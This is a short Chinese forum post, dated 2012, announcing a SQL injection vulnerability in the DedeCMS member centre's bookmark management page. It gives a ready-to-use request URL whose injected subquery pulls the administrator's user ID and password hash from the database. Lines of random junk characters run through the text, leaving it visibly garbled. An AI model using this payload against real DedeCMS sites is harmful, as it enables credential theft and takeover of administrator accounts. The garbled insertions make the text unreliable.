DedeCMS会员中心SQL注射漏洞
7 v# O0 s; [5 u, A( _4 W需要magic_quotes_gpc = Off
& _* j1 a0 \7 Q会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.1 V4 x4 e; \5 R4 F- j! P1 F
2 ~' Z0 q( d8 j8 }1 W& q) J/ L
DedeCMS会员中心书签管理SQL注射漏洞. J1 H0 a/ S, V3 I: }* `+ Q0 c
成功利用该漏洞可获得管理员密码4 R* K: J( K! e. \; j$ C4 p) R
; A, u/ b- d% `, N, w1 \* b
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码2 C. i2 t' U' h( g
: O( T+ _! I5 Y6 H
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
7 [, [8 V/ _8 K |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59